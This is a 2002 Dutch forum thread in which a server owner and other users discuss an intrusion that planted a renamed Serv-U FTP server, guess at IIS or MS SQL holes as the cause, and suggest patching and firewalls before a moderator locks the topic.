  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Ik heb geen overmatig netwerkverkeer meer gevonden... Donderdag ga ik es naast m'n server zitten in Global Switch en de boel es dichtdraaien via ISA... (dank voor het URL). Nog steeds niet duidelijk waar het lek precies zit.

drs. Kama

woensdag 30 oktober 2002 03:04

Acties:
  • 0 Henk 'm!
  • et36s
  • Registratie: Maart 2001
  • Laatst online: 14-09 00:03

et36s

Whoei heb de topic gelezen ik herken toch een aantal mensen die maar beter een andere nick kunnen nemen :D

Dit is waarschijnlijk een simpele IIS Hack geweest... Als je je server fatsoenlijk had gepatched had je dit probleem niet gehad. 250GB ouch!

Maar dat is achteraf...

woensdag 30 oktober 2002 12:12

Acties:
  • 0 Henk 'm!
  • lavagiant
  • Registratie: April 2002
  • Laatst online: 23-03-2018

lavagiant

...

et36s schreef op 30 oktober 2002 @ 03:04:
Whoei heb de topic gelezen ik herken toch een aantal mensen die maar beter een andere nick kunnen nemen :D
Hoezo?

woensdag 30 oktober 2002 12:50

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
et36s schreef op 30 oktober 2002 @ 03:04:
Dit is waarschijnlijk een simpele IIS Hack geweest... Als je je server fatsoenlijk had gepatched had je dit probleem niet gehad. 250GB ouch!

Maar dat is achteraf...
Als je de thread even "fatsoenlijk" gelezen had, had je kunnen zien dat IIS "fatsoenlijk" gepatched is en dat men weer binnen kon komen. Geen simpele IIS hack dus.

drs. Kama

woensdag 30 oktober 2002 14:43

Acties:
  • 0 Henk 'm!
  • et36s
  • Registratie: Maart 2001
  • Laatst online: 14-09 00:03

et36s

Timer.exe is waarschijnlijk een gerenamede serv-u. Timer.exe dient dus als FTP server.

woensdag 30 oktober 2002 14:50

Acties:
  • 0 Henk 'm!

Verwijderd

et36s,

als je nou eens het hele topic leest, dan weet je dat wat je net vertelt niets nieuws is. Verder heb ik geen idee wat je met onderstaande bedoelt:
et36s schreef op 30 oktober 2002 @ 03:04:
Whoei heb de topic gelezen ik herken toch een aantal mensen die maar beter een andere nick kunnen nemen.
Je mag van mij mijn Nick en IP-adres best weten hoor, daar is niets geheims aan. :?
Daar komen mijn ikoontjes en plaatjes die ik in topics gebruik ook vandaan...

woensdag 30 oktober 2002 14:54

Acties:
  • 0 Henk 'm!
  • et36s
  • Registratie: Maart 2001
  • Laatst online: 14-09 00:03

et36s

Mwah jah ik zie het nu dat het meeste al verteld is :D succes in elk geval.

woensdag 30 oktober 2002 15:05

Acties:
  • 0 Henk 'm!
  • aReaRe
  • Registratie: Juli 2001
  • Niet online

aReaRe

Welkom Patrick (11-02-2022) <3

et36s schreef op 30 oktober 2002 @ 14:54:
Mwah jah ik zie het nu dat het meeste al verteld is :D succes in elk geval.
Hoi et36s

Kappen met die offtopic replies! Zie deze oa.: - Onzinnige replies

en wat al eerder gezegd werd: Lees de draad voordat je blaat

Renault Mégane Estate 1.3 TCe EDC (IV) 140pk Bose (oktober 2019) met aan de trekhaak een Caravelair Antares Titanium 390 (mei 2021)

woensdag 30 oktober 2002 20:22

Acties:
  • 0 Henk 'm!
  • ZeroCode
  • Registratie: Februari 2002
  • Laatst online: 11-09 20:39

ZeroCode

Woopie

Duidelijk wat er is gebeurt:
MS SQL exploit en Serv-u geinstalleerd en mega veel ge-FXP'ed.

Wat te doen:
Herinstallatie is niet eens nodig, gewoon scannen op virussen, Winnt en MS SQL server updaten, IIS desnoods de-installeren en voila, klaar :)

woensdag 30 oktober 2002 20:29

Acties:
  • 0 Henk 'm!
  • Cpt.Morgan
  • Registratie: Februari 2001
  • Laatst online: 16-08 17:35

Cpt.Morgan

Verwijderd schreef op 23 oktober 2002 @ 23:26:
Staat er een virusscanner op?!?!?
Is deze volledig up to date??
Is netbiospoort dicht??

1 keer nee? U gaat niet door voor de koelkast ;-)
Never mind this one :) :

Nickname 1loeki1
Aantal postings 3
Gemiddeld aantal postings per dag 1
Geregistreerd op Tuesday 22 October 2002 13:40

woensdag 30 oktober 2002 22:59

Acties:
  • 0 Henk 'm!
  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

Cpt.Morgan schreef op 30 oktober 2002 @ 20:29:
Nickname 1loeki1
Aantal postings 3
Gemiddeld aantal postings per dag 1
Geregistreerd op Tuesday 22 October 2002 13:40

En daar kom je na een week achter :?

Registratietijd makt niet zo gek veel uit trouwens. Iemand die vandaag registreerd kan toch een hoop weten...

Maar goed. Er zijn ondertussen zat offtopic reacties geweest lijkt me. Please ontopic blijven mensen.

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

donderdag 31 oktober 2002 14:07

Acties:
  • 0 Henk 'm!
  • SCIxX
  • Registratie: Augustus 2002
  • Laatst online: 21:32

SCIxX

Ik snap niet dat ze hebben kunnen file transferen via de System volume map, ik dacht dat je niks kon vanuit die map en alle files hidden zijn.

donderdag 31 oktober 2002 14:28

Acties:
  • 0 Henk 'm!

Verwijderd

Anders probeer je MS Personal Webserver :D :D


sorrie, was gemeen....
Hoe hebben ze dat ooit op je comp gekregen? moet natuurlijk een log van zijn

donderdag 31 oktober 2002 14:32

Acties:
  • 0 Henk 'm!
  • MisterData
  • Registratie: September 2001
  • Laatst online: 29-08 20:29

MisterData

Verwijderd schreef op 31 oktober 2002 @ 14:28:
Anders probeer je MS Personal Webserver :D :D


sorrie, was gemeen....
Hoe hebben ze dat ooit op je comp gekregen? moet natuurlijk een log van zijn
Die is nog ouder en waarschijnlijk nog onveiliger :/

donderdag 31 oktober 2002 14:35

Acties:
  • 0 Henk 'm!

Verwijderd

zet sowieso even trojan shield op je pc. Lijkt me een primaaanvulling

donderdag 31 oktober 2002 14:36

Acties:
  • 0 Henk 'm!

Verwijderd

is het geen IIS lek? via IIS lek kom je overal binnen! :7
Hoe ze in die mappen komen is niet zo heel moeilijk er zijn progjes die je hele C kunnen weergeven als je zo'n IIS lek hebt ze kunnen dan via een standaard code zo in die map gaan zitten! Gewoon de zaak goed dicht timmeren IIS update doen.. en een firewall...Ook is er een mogelijkheid dat je via SQL Server bent gehacked dat is inprincipe ook vrij makkelijk! Oplossing..tjs via een firewall wordt het al een stuk moeilijker gewoon IIS updaten en SQL updaten.. dan denk ik dat je van de grootste elende af bent!

donderdag 31 oktober 2002 14:39

Acties:
  • 0 Henk 'm!
  • DeMoN
  • Registratie: Maart 2001
  • Laatst online: 04-09 12:38

DeMoN

Pastafari

Verwijderd schreef op 31 oktober 2002 @ 14:36:
is het geen IIS lek? via IIS lek kom je overal binnen! :7
Hoe ze in die mappen komen is niet zo heel moeilijk er zijn progjes die je hele C kunnen weergeven als je zo'n IIS lek hebt ze kunnen dan via een standaard code zo in die map gaan zitten! Gewoon de zaak goed dicht timmeren IIS update doen.. en een firewall...Ook is er een mogelijkheid dat je via SQL Server bent gehacked dat is inprincipe ook vrij makkelijk!
Kama schreef op 30 oktober 2002 @ 12:50:
[...]


Als je de thread even "fatsoenlijk" gelezen had, had je kunnen zien dat IIS "fatsoenlijk" gepatched is en dat men weer binnen kon komen. Geen simpele IIS hack dus.
omfg |:(

Gamertag: Cosmicv0id
"Het woord Gods is voor mij niets meer dan een expressie en het product van menselijke zwakheid. De Bijbel is een verzamelwerk van legendes die achtenswaardig zijn maar ook primitief en kinderachtig.'' - Albert Einstein

donderdag 31 oktober 2002 15:00

Acties:
  • 0 Henk 'm!
  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

Ik gooi 'm op slot, echt ontopic gaat het niet meer :o

Kama: ik hoor het wel als je meer vragen hebt, dan gooi ik m weer open.

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

Pagina: 1

Dit topic is gesloten.

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq